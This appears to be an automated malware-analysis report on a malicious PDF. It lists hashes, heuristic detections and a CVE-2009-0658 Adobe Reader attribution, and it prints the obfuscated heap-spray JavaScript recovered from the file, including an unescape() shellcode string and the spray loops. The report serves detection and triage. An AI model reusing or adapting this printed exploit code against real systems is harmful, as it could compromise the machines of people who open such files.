Malicious PDF — malware analysis report

Static analysis result for SHA-256 67a2e6be66525d98…

MALICIOUS

PDF

7.1 KB First seen: 2013-07-24
MD5: 573baecb3a7c1298b338ce2e94a5600b SHA-1: 4adf3f6065590d309637f2c4b54dd7e28ad98533 SHA-256: 67a2e6be66525d98985464c4b3cc4ebcab42c9d0b1d5f4d845a2a959fb8031f0
466 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains obfuscated JavaScript that utilizes the unescape function, indicative of a heap spray exploit targeting Adobe Reader (CVE-2009-0658). This JavaScript is designed to download and execute a secondary payload, as suggested by the ClamAV detection of shellcode within an extracted artifact. The specific family is not identifiable from the provided evidence.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9998

Heuristics 9

  • Adobe Reader JBIG2Decode generic heap-spray exploit critical CVE likely CVE_2009_0658_GENERIC_SPRAY
    PDF combines JBIG2Decode image streams with JavaScript heap-spray or decoder scaffolding. This is likely CVE-2009-0658-family Adobe Reader JBIG2 exploitation, but it lacks the stricter Reader-9 version gate or decoded page-word shellcode fingerprint required by the exact rule.
  • JBIG2 + active content high CVE related PDF_JBIG2_ACTIVE_CONTENT
    JBIG2Decode appears with JavaScript/XFA/RichMedia — a related indicator for JBIG2 parser-exploit families including CVE-2021-30860 and CVE-2009-0658, but not a unique CVE fingerprint.
  • ClamAV: Heuristics.PDF.ObfuscatedNameObject critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Heuristics.PDF.ObfuscatedNameObject
  • Hex-obfuscated scripting name object critical PDF_OBFUSCATED_NAME_OBJECT
    A PDF name object that drives script execution (/JavaScript or /JS) is written with #XX hex escapes to hide it from string-based scanners — e.g. /J#61v#61S#63r#69p#74 decoding to /JavaScript. Legitimate PDF producers always write these names literally; hex-encoding an executable name is a deliberate evasion used by exploit-kit and dropper PDFs.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
      var cbrjKSEKDJdDn = "";
      var usWr = unescape("%u4771%u4f9b%u4614%u8d67%u9048%u0d1d%u2975%u7fe3%ub340%u3496%u2c2f%ud523%u83b6%ub2f8%u27b5%u3f37%ue130%u7674%u7e43%uf602%u18eb%ub0f9%ufd22%u9366%ud403%u41bb%u0cbf%ub14b%u042d%u9215%u979f%u4972%u24a8%u7cb4%u993c%u057a%u7aba%u407d%ue08c%u3549%u3772%u78a8%ubb4a%u004e%u77eb%uf53b%u7670%u747f%ub90d%uba91%ub243%ub44b%u883d%u2fe3%u9814%uf831%u9bb7%u6996%ue2d0%ufc3a%u79be%ufd1b%u6793%u970c%ud319%u3cf9%u8d90%ub099%u7e27%u8442%u87d5%u04d6%ub3b1%u2547%u1592%u2ca9%ud40a%u487b%ub51c%u4 …
      var siQekNaHFJRXKupzoFhwvADCgCDlwuwMPh = "";
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • JBIG2Decode filter medium PDF_JBIG2
    JBIG2 image decoder present — historically used in zero-click exploits
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0006_000.js pdf-javascript-stream PDF /JS object 6 at offset 0x231 5302 bytes
SHA-256: 7f9bfa837a88d6f0505662d801c5ad79cb3593bb184a27c54a6fdd995dc85920
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). 14 of 18 identifiers look randomly generated (e.g. 'LwGTgXsNRqivUilgNwfMNUgfSFfgeSrcnLOzcGwU') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
var ZmJKxuwrtEvOVCNenEXmcgDrgYXCwJpmUrJPmv = "";
		var cbrjKSEKDJdDn = "";
		var usWr = unescape("%u4771%u4f9b%u4614%u8d67%u9048%u0d1d%u2975%u7fe3%ub340%u3496%u2c2f%ud523%u83b6%ub2f8%u27b5%u3f37%ue130%u7674%u7e43%uf602%u18eb%ub0f9%ufd22%u9366%ud403%u41bb%u0cbf%ub14b%u042d%u9215%u979f%u4972%u24a8%u7cb4%u993c%u057a%u7aba%u407d%ue08c%u3549%u3772%u78a8%ubb4a%u004e%u77eb%uf53b%u7670%u747f%ub90d%uba91%ub243%ub44b%u883d%u2fe3%u9814%uf831%u9bb7%u6996%ue2d0%ufc3a%u79be%ufd1b%u6793%u970c%ud319%u3cf9%u8d90%ub099%u7e27%u8442%u87d5%u04d6%ub3b1%u2547%u1592%u2ca9%ud40a%u487b%ub51c%u4fb6%u4671%ub8bf%u667c%u9f1d%ufe21%uc7c6%ue1c1%u0573%u2d24%u3441%u3f75%u7349%u137b%u93fd%u15b0%u1404%u1dbf%u75a8%u4e05%ubab8%u7041%u4a37%u2778%ud10b%u0de2%u777a%u3966%u42eb%u7674%uf82a%u28b9%u24f5%ue009%u431c%u2f46%u3c7f%ubb96%u79b6%u2b7d%u7ed5%u912c%u9267%u9934%u4fb2%u0cb3%ufc08%u8db7%ue111%u4035%u1247%u9bf9%ubeb1%u90b5%ua9b4%ud601%u3f48%ue381%u252d%u4b72%u9f98%u2097%u7cd4%u713d%ue232%u7d25%u7779%u8066%u70e0%ub705%u7f99%ueb38%u892d%ubad6%u97b4%u37b5%u4096%uf81a%u1073%ud4d2%u4674%ubb3d%ub892%u7b9b%u4371%u2449%u8d2f%u76b9%u3f0d%u1141%u2ce1%ub61d%u72a8%u0c48%uf919%ue309%u903c%u4a91%ufd83%ube15%u6b9f%ubfd5%u344b%ub142%uf503%u4e35%u277a%u4f98%u677e%u7cb3%u6975%u47fc%ub0a9%u1493%ub204%u1c78%ue108%ud321%u74e3%u7671%u883c%u98d6%u7377%ud532%u1378%ua9d4%u497d%u7cb9%ue038%u252c%uff1b%uf8c1%u4299%ub53f%ub7b6%ub005%u7f9f%u8d4a%u15b1%uf523%u4692%u797b%u3770%u2fbf%ud201%u9bf9%u4875%u7e7a%ub827%u43b4%uba67%u810c%u97fc%u72bb%u4f14%u4047%u4ba8%u29be%u66e2%u3d35%u2d41%u9624%ub290%u804e%uebd0%ufd02%ub393%u341d%u0d04%u1c91%u7dbb%uf512%u0574%u764e%u8567%u7fe2%ub61d%u3b8d%u75fd%u7c7b%u0077%u10eb%u79e1%ufc39%uf786%ue0d1%u497e%u7091%ud42b%u4fb0%ub4bf%u960d%ud633%u9327%u2a7a%u48e3%u992d%u3fa9%ub797%u984a%ua890%u73b2%ub81c%u72b5%u3771%u2cb9%u9f9b%uf987%uf830%u41ba%u4234%ub104%u663d%u2540%uf63a%u78d5%u9214%u7a15%u7735%u7e47%ue220%u744b%u783c%u7543%ub32f%ue389%ube0c%ue184%u7d46%ueb0a%u7124%ue018%u7346%uf831%u3576%ub891%u2579%u7bbf%ud51a%u22bb%u8df9%u7c49%ud628%u0b7f%u05f5%ubaa8%uc08c%ub4d4%u72b5%u480c%u90a9%u98b6%u1592%ub741%u1cb3%u2447%ufd6b%u2f3f%u70b2%u400d%u9bb1%u372d%u424a%ub043%ubeb9%u144f%u1d2c%u2766%u4e34%u9397%u993c%u3d67%u049f%ufc96%uda4b%ubfd2%ud719%u7785%u74d9%uf424%u295a%ub1c9%u3149%u197a%uc283%u0304%u157a%u22fb%u9f79%ucc72%u6082%u44e4%u5167%u3236%uc0e3%u3086%ue8a1%u146d%u7a52%ub103%ucb55%ue7a9%ucc58%u281c%u0e36%ud43f%u4345%ue59f%u9685%u22de%u59fb%ufbb2%ucb77%u8f22%ud0ca%u5f43%u6841%uda3b%u1d96%ue5f1%u8ec6%uae8e%ua5fe%u0ec8%u6afe%u720b%u0649%u00ff%uce48%ue9ce%u2e7a%ud79c%ua3b2%u10dd%u5c74%u6aa8%ue186%ua8aa%u3df4%u2d3f%ub55e%u95e7%u1a5e%u5d71%ud76c%u39f6%ue671%u31db%u638d%u95da%u3707%u31f8%ue343%u6361%u4229%u739e%u3b95%uff3a%u2f34%ua23c%u9c50%u5d72%u8aa1%u2e05%u1593%ub8bd%ude9f%u3e1b%uf4df%ud0db%uf71e%uf81b%ua3e4%u924b%ucbcd%u6200%u19f1%u3286%uf25d%ue366%ua21d%ue90e%u9d91%u122e%ub678%ue8c4%u79eb%uf3b0%u11ef%uf3c2%u5aee%u154b%u8c9a%u8d1d%u3433%u4504%ub9a5%u2393%u32e5%ud317%ub2a8%uc752%u335d%ub529%u4cc8%ud084%ud8f4%u7322%u74a2%ua228%uda84%u81d3%ud39e%u6a41%u1bc9%u6a85%u4a09%u6acf%u2a61%u38ab%u3594%u2d66%ua005%u0488%u63f9%uaae0%u4324%u55af%u5503%u838c%ud36a%ua1e4%u1f9e");
		var siQekNaHFJRXKupzoFhwvADCgCDlwuwMPh = "";

		for (mebjlDiyiPLdAbuetJostNJRYjSfiUiVrKmGGs=128;mebjlDiyiPLdAbuetJostNJRYjSfiUiVrKmGGs>=0;--mebjlDiyiPLdAbuetJostNJRYjSfiUiVrKmGGs) siQekNaHFJRXKupzoFhwvADCgCDlwuwMPh += unescape("%u4837%u461c");
		AmMVHa = siQekNaHFJRXKupzoFhwvADCgCDlwuwMPh + usWr;
		PQTvdTN = unescape("%u4837%u461c");
		PTaqTpJSaROmkarRSvyhA = 20;
		uyTj = PTaqTpJSaROmkarRSvyhA+AmMVHa.length
		while (PQTvdTN.length<uyTj) PQTvdTN+=PQTvdTN;
		pkIdhaDYJrfLwPajYQknVegGOo = PQTvdTN.substring(0, uyTj);
		cHXMHBNkHzEgnfHcMzbqjqOllav = PQTvdTN.substring(0, PQTvdTN.length-uyTj);
		while(cHXMHBNkHzEgnfHcMzbqjqOllav.length+uyTj < 0x40000) cHXMHBNkHzEgnfHcMzbqjqOllav = cHXMHBNkHzEgnfHcMzbqjqOllav+cHXMHBNkHzEgnfHcMzbqjqOllav+pkIdhaDYJrfLwPajYQknVegGOo;
		LwGTgXsNRqivUilgNwfMNUgfSFfgeSrcnLOzcGwUPlxv = new Array();
		for (mebjlDiyiPLdAbuetJostNJRYjSfiUiVrKmGGs=0;mebjlDiyiPLdAbuetJostNJRYjSfiUiVrKmGGs<100;mebjlDiyiPLdAbuetJostNJRYjSfiUiVrKmGGs++) LwGTgXsNRqivUilgNwfMNUgfSFfgeSrcnLOzcGwUPlxv[mebjlDiyiPLdAbuetJostNJRYjSfiUiVrKmGGs] = cHXMHBNkHzEgnfHcMzbqjqOllav + AmMVHa;

		for (mebjlDiyiPLdAbuetJostNJRYjSfiUiVrKmGGs=142;mebjlDiyiPLdAbuetJostNJRYjSfiUiVrKmGGs>=0;--mebjlDiyiPLdAbuetJostNJRYjSfiUiVrKmGGs) cbrjKSEKDJdDn += unescape("%ub550%u0166");
		bjCBNMJvUbUz = cbrjKSEKDJdDn.length + 20
		while (cbrjKSEKDJdDn.length < bjCBNMJvUbUz) cbrjKSEKDJdDn += cbrjKSEKDJdDn;
		QeaoGDzduCYOOGPXsGMlQNQcn = cbrjKSEKDJdDn.substring(0, bjCBNMJvUbUz);
		qLRPmoKDVCTNZgLpSnanMdLpODLXOUgLYMgKqEHIFBd = cbrjKSEKDJdDn.substring(0, cbrjKSEKDJdDn.length-bjCBNMJvUbUz);
		while(qLRPmoKDVCTNZgLpSnanMdLpODLXOUgLYMgKqEHIFBd.length+bjCBNMJvUbUz < 0x40000) qLRPmoKDVCTNZgLpSnanMdLpODLXOUgLYMgKqEHIFBd = qLRPmoKDVCTNZgLpSnanMdLpODLXOUgLYMgKqEHIFBd+qLRPmoKDVCTNZgLpSnanMdLpODLXOUgLYMgKqEHIFBd+QeaoGDzduCYOOGPXsGMlQNQcn;
		wvmADwMnJWwlOfOzNnaDTRgUUiVX = new Array();
		for (mebjlDiyiPLdAbuetJostNJRYjSfiUiVrKmGGs=0;mebjlDiyiPLdAbuetJostNJRYjSfiUiVrKmGGs<125;mebjlDiyiPLdAbuetJostNJRYjSfiUiVrKmGGs++) wvmADwMnJWwlOfOzNnaDTRgUUiVX[mebjlDiyiPLdAbuetJostNJRYjSfiUiVrKmGGs] = qLRPmoKDVCTNZgLpSnanMdLpODLXOUgLYMgKqEHIFBd + cbrjKSEKDJdDn;
javascript_obj0006_000_shellcode_00.bin pdf-js-shellcode pdf-js-unescape-shellcode recovered from PDF /JS object 6 at offset 0x231 1024 bytes
SHA-256: dc152f55161b1f562aaa2d5b8a496ce73c47ddca70a6fb17d1728de572a63d34
Detection
ClamAV: Win.Trojan.MSShellcode-6360729-4
Obfuscation or payload: unlikely